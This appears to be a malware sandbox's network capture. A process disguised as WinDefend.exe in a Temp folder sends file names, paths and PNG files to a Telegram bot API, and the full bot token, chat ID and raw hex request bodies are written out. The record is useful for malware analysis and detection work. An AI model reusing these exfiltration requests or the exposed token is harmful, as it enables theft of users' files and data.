2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: dc 8f 5c 33 67 ce cc c8 c8 a0 0a d2 9c 3e 7d 7a e4 c8 91 dd ba 75 23 97 9f 9f 9f 9d 8f bd ed ba 51 d6 ba 75 eb 3e fb ec b3 0f 3e f8 c0 7e 27 89 2a 76 ef de cd 73 0a 41 56 11 f5 a9 53 a7 56 55 55 e5 e4 e4 60 8c 27 4e 9c 40 23 c9 78 fe fc f9 21 43 86 24 25 25 99 f4 62 dd 63 c6 8c 41 41 29 b6 bc bc 7c d9 b2 65 54 64 cd b6 d3 bc 34 00 ef c5 5a 2d 7d 78 78 f8 77 df 7d 97 9d 9d 4d f3 90 55 34 95 06 d0 78 ac 9b 62 c9 88 63 d3 f7 6b d7 ae b9 9f 2d df b9 73 27 05 5a 53 a9 b1 a6 a6 26 3d 3d 9d 72 28 9c 88 d1 54 32 ce 9b 37 6f ce 9c 39 5f 7f fd 35 e2 fd fd f7 df 5f bd 7a 75 ca 94 29 ce 4d bf 71 e6 1f 7e f8 c1 ce 93 d3 92 73 e7 ce 11 16 7a da b3 67 cf 89 13 27 da d9 6f 22 70 f8 f0 61 8a 65 e3 47 1f 7d 84 3f 9b 3c 6b 77 15 42 08 21 84 90 24 0b 21 1e 3a 48 20 c2 86 58 Data Ascii: \3g>}zu#Qu>>~'*vsAVSVUU`'N@#x!C$%%bcAA)\|eTd4Z-}xxw}MU4xbck-s'ZS&==r(T27o9_5_zu)Mq~szg'o"paeG}?<kwB!$!:H X
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: 1f 4f 51 f6 0d 6a da c3 46 e7 86 70 f4 d1 c4 9b 80 d8 f9 5e 33 4f 77 49 26 08 38 27 c3 cd 73 e7 3c 33 19 cd ea 9d bb 5b 9b 24 23 b7 ec e1 08 30 bb 04 1b 19 41 e2 ec 08 bf bb 24 03 b5 10 c0 25 4b 96 f0 2a b5 98 24 d3 17 f6 6a da 4c 7a fb 10 84 e7 b4 8d 58 d9 7b 84 8a c8 42 7f 09 a9 73 53 3d f6 5e fb 32 ff b9 73 e7 ac 8f ec 06 f4 9d 46 de 51 92 89 36 2f 31 82 0c d3 a5 4b 97 9c 5b 8e 09 21 84 10 42 92 2c 84 b8 33 ac b3 59 fd b3 2e c7 54 17 2d 5a c4 a2 1f 31 e0 09 7a 13 1d 1d 8d 79 b2 be c7 94 7c 7d 7d 4d 92 59 9d 27 24 24 a0 25 b3 67 cf de b5 6b 17 a2 62 5f 8b 35 31 20 0d cb 7a bc 8b e5 3e 85 50 2c ea 85 d1 99 24 a3 07 78 97 23 c9 a8 02 8b 78 1c 80 06 e0 3f 2c f7 a9 9d d5 3c 7f 63 62 62 b0 0e 3c 0a 1d 32 09 24 2f 56 4c 7b 68 a7 dd 5d 19 25 c0 0d 50 05 36 a2 Data Ascii: OQjFp^3OwI&8's<3[$#0A$%K*$jLzX{BsS=^2sFQ6/1K[!B,3Y.T-Z1zy\|}}MY'$$%gkb_51 z>P,$x#x?,<cbb<2$/VL{h]%P6
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: ea d5 ab 3a 1c b5 4f 49 49 49 79 79 39 9e ac 50 08 21 24 c9 42 08 d1 51 58 5f c6 c7 c7 af 5d bb 76 d6 ac 59 53 a6 4c 99 3a 75 ea 4f 3f fd 34 63 c6 8c 99 77 61 ee dc b9 de de de e7 cf 9f 6f 6c 6c 54 f4 84 10 8f 90 9c 9c 9c 1b 37 6e 48 92 db a1 b0 b0 b0 ac ac ac b9 b9 59 a1 10 42 48 92 85 10 77 a5 a5 a5 85 15 43 49 49 c9 ef 71 bc 2b 57 ae 6c de bc b9 b2 b2 f2 37 2d ce 58 a6 9c 3e 7d 9a 25 4b fb d7 07 56 57 57 d3 bc a6 a6 a6 bb 25 28 2d 2d f5 f5 f5 cd cb cb fb fd d7 19 d2 7e 9a 34 7b f6 ec 79 f3 e6 6d dd ba 75 df be 7d 01 01 01 4b 97 2e 1d 3b 76 ec e8 d1 a3 c7 dc 09 5e 1a 37 6e 1c 22 7d e4 c8 91 86 86 86 fb 88 7f 5d 5d 5d 6d 6d ed ef 39 b3 51 5c 5c 9c 92 92 f2 5b 47 90 70 dd f3 bc 13 2f d5 d7 d7 df c7 82 d2 32 d2 b5 76 0a 67 c7 63 cf 21 99 de 86 42 48 92 1f Data Ascii: :OIIIyy9P!$BQX_]vYSL:uO?4cwaollT7nHYBHwCIIq+Wl7-X>}%KVWW%(--~4{ymu}K.;v^7n"}]]]mm9Q\\[Gp/2vgc!BH
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: 23 97 53 ab d5 94 2d d5 53 a3 d1 3c e4 01 21 bd 24 99 67 fa b1 1f fc 94 56 52 86 9b 0f b7 3e 7d fa 34 ed ce 43 3e 0a 95 9a 5f e4 f9 74 a0 a8 44 da 77 6a ba d1 71 26 a5 a4 b7 74 9c e7 e6 e6 48 14 19 49 9e 9f 9f 7f 50 92 67 67 67 45 22 11 6d 42 5f 1c 2d 93 88 d2 f1 a4 64 f4 b5 d2 01 a4 dc 28 3d 1d 6a 72 63 5a 4f 5f 0d 79 2c 7d cb d4 ec 5b 79 3a da 83 92 cc 0c db 66 24 d9 ed 76 b7 b7 b7 53 f5 a8 9e f4 0d d2 57 4c 07 9f de 32 92 4c 75 eb e8 e8 a0 05 36 9b 5d 59 59 c9 0c ba 5e 79 22 17 6d 48 a2 4b ba 4b a2 4e 45 d0 d7 41 9f ae 48 32 fd 7b 63 fa cc 69 1f a9 da d4 f4 64 04 9e ea 46 d5 a6 5a d1 5e 43 92 c1 8f 03 72 bf 3f c4 72 8e 16 89 ff db ed b9 b4 61 5d e5 9c 91 24 99 ac 52 66 72 ef cd 15 d6 b2 4c 24 72 d5 73 46 9b db 77 ac 4c 12 fd f5 3d c9 4a b3 87 64 38 73 Data Ascii: #S-S<!$gVR>}4C>_tDwjq&tHIPgggE"mB_-d(=jrcZO_y,}[y:f$vSWL2Lu6]YY^y"mHKKNEAH2{cidFZ^Cr?ra]$RfrL$rsFwL=Jd8s
2024-05-23 13:35:49 UTC	4096	OUT	Data Raw: 7b e4 46 1f b3 2c 33 78 15 26 bf f4 89 54 43 ac 73 ab 4c 1e af 0f 7f 04 00 6c c6 8c c2 f1 7a 3a ef 5f 82 67 ff fb 8d 99 ef 8c df dc 67 b7 70 cc ce ed f6 64 3a 09 cb 4d 6e b3 d3 fb 8c 3e a5 8f ae 08 74 01 8a 8c 8c 8c 8f 8f 6f 6b 6b a3 8b 94 42 a1 50 ab d5 2a 95 8a cf e7 d3 e5 29 36 36 96 6c 79 68 68 68 4b b7 db 88 44 22 81 40 b0 ee 8f bf 74 11 59 58 58 b0 5a ad 90 64 00 00 24 19 00 b0 a1 24 9b cd 66 6a 2e 3c a4 ee 52 32 d2 e3 d4 d4 d4 d0 d0 50 6a c7 fc a0 92 4c 4a 5c 51 51 71 fb f6 ed 4b 97 2e 65 66 66 72 b9 5c c6 93 a9 c2 26 93 e9 91 1f c7 1d e8 46 b6 78 a5 df cf 75 1f 41 6e 69 13 9e c2 da 37 be c0 53 58 c8 90 67 79 aa ba d6 7e 96 40 f3 c4 14 1d 9d c9 00 6c 4e ce b8 fe ff be 35 77 20 57 f0 49 a5 64 b3 a8 92 9c 2a 11 ff c7 6b d3 61 9d 2a 83 fd d1 7f b3 d3 Data Ascii: {F,3x&TCsLlz:_ggpd:Mn>tokkBP)66lyhhhKD"@tYXXZd$$fj.<R2PjLJ\QQqK.effr\&FxuAni7SXgy~@lN5w WIdka*
2024-05-23 13:35:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.5	61271	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:49 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 349 Expect: 100-continue
2024-05-23 13:35:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:49 UTC	349	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 32 35 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 Data Ascii: chat_id=1655240967&text=File%3A+256.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applica
2024-05-23 13:35:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.5	61272	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:49 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 229 Expect: 100-continue
2024-05-23 13:35:49 UTC	229	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 68 69 5f 63 6f 6e 74 72 61 73 74 25 35 43 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 37 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+core_icons_hiContrast_wob.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Chi_contrast%5Ccore_icons_hiContrast_wob.png%0ASize%3A+7+KB
2024-05-23 13:35:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:49 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:49 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.5	61273	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:50 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:35:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:50 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 35 36 33 35 30 65 63 35 61 35 62 33 31 30 65 39 66 34 63 37 65 31 30 65 30 62 36 37 39 35 63 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 61 35 36 33 35 30 65 63 35 61 35 62 33 31 30 65 39 66 34 63 37 65 31 30 65 30 62 36 37 39 35 63 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 32 34 Data Ascii: chat_id=1655240967&text=File%3A+a56350ec5a5b310e9f4c7e10e0b6795c.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Ca56350ec5a5b310e9f4c7e10e0b6795c.png%0ASize%3A+324
2024-05-23 13:35:50 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:50 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.5	61274	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:50 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="6317a6f4-f9a6-4639-b805-73f0b2836928" Host: api.telegram.org Content-Length: 4359 Expect: 100-continue
2024-05-23 13:35:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:50 UTC	40	OUT	Data Raw: 2d 2d 36 33 31 37 61 36 66 34 2d 66 39 61 36 2d 34 36 33 39 2d 62 38 30 35 2d 37 33 66 30 62 32 38 33 36 39 32 38 0d 0a Data Ascii: --6317a6f4-f9a6-4639-b805-73f0b2836928
2024-05-23 13:35:50 UTC	93	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 32 35 36 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 32 35 36 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=256.png; filename*=utf-8''256.png
2024-05-23 13:35:50 UTC	4041	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 0f 90 49 44 41 54 78 9c ed dd 5d a8 65 e7 5d c7 f1 ef ff 59 6b ef 73 ce 4c 32 49 26 49 3b 12 03 95 36 85 b4 5e 04 03 42 c0 da 5e 54 85 b6 a8 37 09 6a 1b 34 a5 45 a3 88 9a 2b 7b 95 73 21 e8 85 f4 a6 d8 d2 17 68 c4 8a 98 2a bd 10 8b a5 8d 49 4b 4a 11 1b 6c a1 51 9a 68 a8 86 92 97 49 e7 2d 33 73 de f6 f3 fc bc 58 6b 9f 9c 24 cd 9c 93 e6 ec b3 f7 da cf ef 03 9b bd 67 27 03 cf 7a d6 7a 7e eb 79 fe 6b ad d9 60 66 66 66 66 66 66 66 66 66 66 66 66 66 66 66 cb 22 e6 dd 80 59 10 04 eb 04 ef 20 1e f9 4f e2 3d ef ee ff c3 13 cb b9 bd 0b ef 76 e0 45 c4 7b c8 11 68 de cd b1 25 24 11 7a 98 56 9f 66 34 ef b6 d8 6b d3 83 34 f3 6e 83 bd a4 9d 77 03 0e 83 d6 49 11 14 60 Data Ascii: PNGIHDR\rfIDATx]e]YksL2I&I;6^B^T7j4E+{s!h*IKJlQhI-3sXk$g'zz~yk`fffffffffffffff"Y O=vE{h%$zVf4k4nwI`
2024-05-23 13:35:50 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 33 31 37 61 36 66 34 2d 66 39 61 36 2d 34 36 33 39 2d 62 38 30 35 2d 37 33 66 30 62 32 38 33 36 39 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --6317a6f4-f9a6-4639-b805-73f0b2836928Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:50 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:50 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 33 31 37 61 36 66 34 2d 66 39 61 36 2d 34 36 33 39 2d 62 38 30 35 2d 37 33 66 30 62 32 38 33 36 39 32 38 2d 2d 0d 0a Data Ascii: --6317a6f4-f9a6-4639-b805-73f0b2836928--
2024-05-23 13:35:51 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:51 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.5	61275	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:50 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="adbbb210-efe3-4ce1-a332-776add664964" Host: api.telegram.org Content-Length: 8060 Expect: 100-continue
2024-05-23 13:35:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:51 UTC	40	OUT	Data Raw: 2d 2d 61 64 62 62 62 32 31 30 2d 65 66 65 33 2d 34 63 65 31 2d 61 33 33 32 2d 37 37 36 61 64 64 36 36 34 39 36 34 0d 0a Data Ascii: --adbbb210-efe3-4ce1-a332-776add664964
2024-05-23 13:35:51 UTC	137	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 63 6f 72 65 5f 69 63 6f 6e 73 5f 68 69 43 6f 6e 74 72 61 73 74 5f 77 6f 62 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=core_icons_hiContrast_wob.png; filename*=utf-8''core_icons_hiContrast_wob.png
2024-05-23 13:35:51 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 bc 00 00 01 2c 08 03 00 00 00 16 ea 90 af 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 01 53 50 4c 54 45 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ef fb ff f6 f6 f6 fe f3 f3 f5 f5 f5 f3 f3 f3 e2 f6 ff dd f6 ff f1 f1 f1 ef ef ef ed ed ed fd e9 e9 eb eb eb cc f2 ff e7 e7 e7 fc e1 e1 e5 e5 e5 fc df df bb ee ff e3 e3 e3 e1 e1 e1 b6 e9 ff df df df aa ea ff dd dd dd ad e9 ff db db db d9 d9 d9 d7 d7 d7 99 e5 ff ff cc cc d5 d5 d5 d3 d3 d3 88 e1 ff 8d e0 ff 9e db f9 fa c2 c2 8a dc ff cc cc cc 7c dc ff 77 dd ff f9 bc bc f9 bb bb 8e d5 f8 7c d8 ff f9 b7 b7 66 d9 ff 6c d7 ff c2 c2 c2 6d d4 ff 7d cf f6 be be be 55 d4 ff 5c Data Ascii: PNGIHDR,sBITOSPLTE\|w\|flm}U\
2024-05-23 13:35:51 UTC	3602	OUT	Data Raw: a3 c3 55 34 29 af 08 f8 80 28 ef fa 67 e4 2a f4 f7 fb d4 50 68 34 d2 04 a8 3d 44 97 f2 06 79 f7 61 6c 71 d1 49 de 99 4c 8b cb 8e 90 b7 b3 94 27 63 b5 3b 54 4f 97 97 78 9c ed 65 bb dc b8 e8 32 d1 87 e4 be fb 8e 56 4e b8 3a 30 67 0e 57 e7 f5 11 73 bd f9 33 31 53 7f cc 49 69 50 5e 51 fe a3 c3 0f 1c 5e b2 c0 6b 1c b1 35 b9 46 91 38 35 58 4e 46 fd 5e af 37 4d 96 b5 e3 46 49 b2 76 5e be e1 23 f3 3f 47 c1 74 92 4f 04 e3 45 97 22 ef 34 19 8a be 83 28 2a ce be 65 42 9a d6 15 96 c7 80 e5 30 bf 24 47 1c 36 98 c8 0a 44 e7 a1 1b f5 73 6b f3 4f ec 50 e5 dd 5d 5d 94 33 27 ab 55 2c 0d ae 1d ef 8d f4 c4 31 49 64 83 e6 89 6d 18 af dc da be e5 4d dd 3d 60 be 71 c7 bb bc b3 74 db 4b c6 16 77 1d e5 5d ca ec 26 27 d2 53 10 82 bc 13 79 b8 2c e4 1d d5 1d d2 3b 3d b1 99 33 f1 64 Data Ascii: U4)(gPh4=DyalqIL'c;TOxe2VN:0gWs31SIiP^Q^k5F85XNF^7MFIv^#?GtOE"4(eB0$G6DskOP]]3'U,1IdmM=`qtKw]&'Sy,;=3d
2024-05-23 13:35:51 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 64 62 62 62 32 31 30 2d 65 66 65 33 2d 34 63 65 31 2d 61 33 33 32 2d 37 37 36 61 64 64 36 36 34 39 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --adbbb210-efe3-4ce1-a332-776add664964Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:35:51 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:35:51 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 64 62 62 62 32 31 30 2d 65 66 65 33 2d 34 63 65 31 2d 61 33 33 32 2d 37 37 36 61 64 64 36 36 34 39 36 34 2d 2d 0d 0a Data Ascii: --adbbb210-efe3-4ce1-a332-776add664964--
2024-05-23 13:35:51 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:35:51 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
225	192.168.2.5	61276	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:35:51 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a792a574-c062-4494-a9a0-0321e9c28bf8" Host: api.telegram.org Content-Length: 332197 Expect: 100-continue
2024-05-23 13:35:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:35:52 UTC	40	OUT	Data Raw: 2d 2d 61 37 39 32 61 35 37 34 2d 63 30 36 32 2d 34 34 39 34 2d 61 39 61 30 2d 30 33 32 31 65 39 63 32 38 62 66 38 0d 0a Data Ascii: --a792a574-c062-4494-a9a0-0321e9c28bf8
2024-05-23 13:35:52 UTC	151	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 35 36 33 35 30 65 63 35 61 35 62 33 31 30 65 39 66 34 63 37 65 31 30 65 30 62 36 37 39 35 63 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 35 36 33 35 30 65 63 35 61 35 62 33 31 30 65 39 66 34 63 37 65 31 30 65 30 62 36 37 39 35 63 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=a56350ec5a5b310e9f4c7e10e0b6795c.png; filename*=utf-8''a56350ec5a5b310e9f4c7e10e0b6795c.png
2024-05-23 13:35:52 UTC	4096	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 f0 00 00 04 7e 08 02 00 00 00 10 95 83 3c 00 00 80 00 49 44 41 54 78 da ec dd 4d 88 64 d7 81 2f f8 cc 5d a6 78 56 0f b8 0c 7e bd e8 a1 d2 f0 72 61 2f 1e 7e 5e 08 5e 18 b2 61 04 5a 34 d3 0b 07 a4 a1 07 2d 1a 0c 8a 86 82 59 18 1a 5a 38 e4 02 2d 44 37 4c d6 f5 73 3d f0 d3 c2 50 a3 30 1a 18 b4 18 97 e8 30 b3 12 0c 64 13 d0 c3 80 c0 e3 52 a5 18 46 4c 63 43 b6 d2 1b 51 83 c6 51 ae c9 8f aa cc c8 8c fb 71 ee c7 89 b8 37 e2 f7 a3 56 55 59 91 f7 9e 7b ce b9 e7 fc e3 dc 73 37 ee ff a7 ff e4 8f 3f fe f8 e3 8f 3f fe f8 e3 8f 3f fe f8 e3 8f 3f fe f8 e3 4f 87 fe 6c 28 02 7f fc f1 c7 1f 7f fc f1 c7 1f 7f fc f1 c7 1f 7f fc f1 c7 9f 4e 06 3a cf 00 00 00 00 68 3d 81 0e 00 00 00 40 c7 08 74 00 00 00 00 3a 46 a0 03 00 Data Ascii: PNGIHDR~<IDATxMd/]xV~ra/~^^aZ4-YZ8-D7Ls=P00dRFLcCQQq7VUY{s7????Ol(N:h=@t:F
